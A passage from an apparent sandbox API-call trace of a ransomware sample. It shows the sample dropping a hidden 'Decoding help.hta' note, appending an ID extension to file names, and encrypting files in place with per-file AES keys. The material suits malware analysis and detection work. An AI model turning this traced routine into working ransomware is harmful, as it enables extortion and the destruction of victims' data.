lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\", lpString2="OnoteLR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" [0061.358] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" [0061.358] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" [0061.358] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.991] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x68c [0061.991] CreateFileMappingA (hFile=0x68c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xe78 [0061.991] CryptAcquireContextA (phProv=0xbb8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 133 os_tid = 0x8ec [0040.210] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\*.*", lpFindFileData=0xbccfd30 | out: lpFindFileData=0xbccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7aa9d740, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7e0ead20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7e0ead20, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5830 [0040.211] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.211] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xbccfd30 | out: lpFindFileData=0xbccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7aa9d740, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7e0ead20, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7e0ead20, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.211] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.211] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.211] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xbccfd30 | out: lpFindFileData=0xbccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Application", cAlternateFileName="APPLIC~1")) returned 1 [0040.211] lstrcmpW (lpString1=".", lpString2="Application") returned -1 [0040.211] lstrcmpW (lpString1="..", lpString2="Application") returned -1 [0040.211] lstrcmpiW (lpString1="windows", lpString2="Application") returned 1 [0040.213] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\*.*" [0040.213] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\*.*") returned 44 [0040.213] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\", lpString2="Application" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application" [0040.213] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Google\\Chrome\\Application\\*.*" [0040.213] GlobalMemoryStatus (in: lpBuffer=0xbccfd10 | out: lpBuffer=0xbccfd10) [0040.213] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10ce69a0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x23c [0040.214] CloseHandle (hObject=0x23c) returned 1 [0040.214] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xbccfd30 | out: lpFindFileData=0xbccfd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7ded59e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x7ded59e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x7ded59e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Application", cAlternateFileName="APPLIC~1")) returned 0 [0040.214] FindClose (in: hFindFile=0x5a5830 | out: hFindFile=0x5a5830) returned 1 Thread: id = 134 os_tid = 0x8bc [0040.215] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\*.*", lpFindFileData=0xbe0fd30 | out: lpFindFileData=0xbe0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8d1336, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8d1336, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7f10 [0040.757] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.757] FindNextFileW (in: hFindFile=0x5d7f10, lpFindFileData=0xbe0fd30 | out: lpFindFileData=0xbe0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8d1336, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8d1336, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0040.758] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0040.758] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0040.758] FindNextFileW (in: hFindFile=0x5d7f10, lpFindFileData=0xbe0fd30 | out: lpFindFileData=0xbe0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0040.758] lstrcmpW (lpString1=".", lpString2="Microsoft") returned -1 [0040.758] lstrcmpW (lpString1="..", lpString2="Microsoft") returned -1 [0040.758] lstrcmpiW (lpString1="windows", lpString2="Microsoft") returned 1 [0041.108] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\*.*" [0041.108] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\*.*") returned 57 [0041.108] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\", lpString2="Microsoft" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft" [0041.108] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\*.*" [0041.108] GlobalMemoryStatus (in: lpBuffer=0xbe0fd10 | out: lpBuffer=0xbe0fd10) [0041.108] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11213e28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x220 [0041.121] CloseHandle (hObject=0x220) returned 1 [0041.121] FindNextFileW (in: hFindFile=0x5d7f10, lpFindFileData=0xbe0fd30 | out: lpFindFileData=0xbe0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd8d1336, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd8f7490, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd8f7490, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 0 [0041.121] FindClose (in: hFindFile=0x5d7f10 | out: hFindFile=0x5d7f10) returned 1 Thread: id = 135 os_tid = 0x8b8 [0040.215] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0xbf4fd30 | out: lpFindFileData=0xbf4fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d7ed0 [0041.785] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0041.785] FindNextFileW (in: hFindFile=0x5d7ed0, lpFindFileData=0xbf4fd30 | out: lpFindFileData=0xbf4fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.785] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0041.785] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0041.785] FindNextFileW (in: hFindFile=0x5d7ed0, lpFindFileData=0xbf4fd30 | out: lpFindFileData=0xbf4fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1 [0041.785] lstrcpyW (in: lpString1=0x9a73010, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*" [0041.785] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.785] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0041.785] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0xffffffff [0041.785] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x48c [0041.786] WriteFile (in: hFile=0x48c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0xbf4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0xbf4fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0041.787] CloseHandle (hObject=0x48c) returned 1 [0041.787] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0041.787] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ProjectMUI.msi") returned -1 [0041.787] lstrlenW (lpString="ProjectMUI.msi") returned 14 [0041.787] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*" [0041.787] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0041.787] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", lpString2="ProjectMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" [0041.787] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" [0041.787] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" [0041.787] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.019] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.msi.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4d4 [0042.020] CreateFileMappingA (hFile=0x4d4, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x4d8 [0042.020] CryptAcquireContextA (in: phProv=0xbf4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0xbf4fcec*=0x344a1b0) returned 1 [0045.312] CryptGenKey (in: hProv=0x344a1b0, Algid=0x6610, dwFlags=0x1, phKey=0xbf4fce8 | out: phKey=0xbf4fce8*=0x5d7d10) returned 1 [0045.312] CryptExportKey (in: hKey=0x5d7d10, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0xbf4fbe4, pdwDataLen=0xbf4fce4 | out: pbData=0xbf4fbe4*, pdwDataLen=0xbf4fce4*=0x2c) returned 1 [0045.312] MapViewOfFile (hFileMappingObject=0x4d8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0xf750000 [0045.783] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xbf4fbe4*, pdwDataLen=0xbf4fcf8*=0x40, dwBufLen=0x100 | out: pbData=0xbf4fbe4*, pdwDataLen=0xbf4fcf8*=0x100) returned 1 [0048.901] CryptEncrypt (in: hKey=0x5d7d10, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xf750000, pdwDataLen=0xbf4fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0xf750000*, pdwDataLen=0xbf4fce4*=0x100000) returned 1 [0049.183] UnmapViewOfFile (lpBaseAddress=0xf750000) returned 1 [0049.694] CloseHandle (hObject=0x4d8) returned 1 [0049.694] CryptDestroyKey (hKey=0x5d7d10) returned 1 [0049.694] CryptReleaseContext (hProv=0x344a1b0, dwFlags=0x0) returned 1 [0049.695] SetFilePointerEx (in: hFile=0x4d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0049.695] WriteFile (in: hFile=0x4d4, lpBuffer=0xbf4fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0xbf4fcf8, lpOverlapped=0x0 | out: lpBuffer=0xbf4fbe4*, lpNumberOfBytesWritten=0xbf4fcf8*=0x100, lpOverlapped=0x0) returned 1 [0052.144] WriteFile (in: hFile=0x4d4, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0xbf4fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0xbf4fcf8*=0x500, lpOverlapped=0x0) returned 1 [0052.144] CloseHandle (hObject=0x4d4) returned 1 [0053.812] SetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.msi.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.432] FindNextFileW (in: hFindFile=0x5d7ed0, lpFindFileData=0xbf4fd30 | out: lpFindFileData=0xbf4fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x30a2b7b0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x30a2b7b0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b2ebe0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0x0, dwReserved1=0x0, cFileName="ProjectMUI.xml", cAlternateFileName="PROJEC~1.XML")) returned 1 [0058.432] lstrcpyW (in: lpString1=0x1101f668, lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*" [0058.432] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0058.432] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Decoding help.hta") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Decoding help.hta" [0058.432] GetFileAttributesW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Decoding help.hta" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\decoding help.hta")) returned 0x1 [0058.432] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ProjectMUI.xml") returned -1 [0058.432] lstrlenW (lpString="ProjectMUI.xml") returned 14 [0058.432] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*" [0058.432] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*.*") returned 70 [0058.432] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", lpString2="ProjectMUI.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" [0058.432] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" [0058.432] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0058.432] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0061.611] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjectMUI.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\projectmui.xml.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x880 [0061.611] CreateFileMappingA (hFile=0x880, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x890 [0061.611] CryptAcquireContextA (phProv=0xbf4fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000) Thread: id = 136 os_tid = 0x8b4 [0040.216] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\*.*", lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa1d4a90, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa1d4a90, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a5830 [0040.216] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0040.216] FindNextFileW (in: hFindFile=0x5a5830, lpFindFileData=0xc08fd30 | out: lpFindFileData=0xc08fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, 